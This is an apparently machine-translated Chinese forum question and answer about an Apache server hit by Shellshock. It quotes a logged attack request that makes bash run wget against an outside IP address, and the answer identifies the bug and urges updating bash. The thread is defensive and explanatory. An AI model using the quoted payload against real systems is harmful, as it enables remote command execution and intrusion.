我在Apache 2.2.22上运行了几个虚拟主机,只是在日志中注意到一个相当惊人的事件,来自冰岛的“安全扫描程序”能够通过以下http请求将文件转换到cgi-bin目录行:
() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"
它有效地下载了有问题的文件
任何人都可以解释这个请求如何设法实际执行bash命令吗?
当然,cgi-bin不应该是可写的,但是理解这种类型的漏洞利用函数以及是否有某种方法来更改Apache配置参数以便永远不会执行请求命令仍然会有所帮助...
这可能是无关的,但几个小时后,内部界面开始出现一连串奇怪的请求,每2秒发生一次:
host: ":443" request: "NICK netply" source ip: 127.0.0.1
答案 0 :(得分:1)
这是bash中的一个漏洞,它通过Apache公开,称为" Shellshock"或者" bash bug"并允许攻击者在本地和远程执行任意命令,使其成为一个非常严重的漏洞。
您需要更新bash
,但是您已经显示已经受损系统的迹象。有关shellshock(包括检测和修复)的更多信息,请参阅: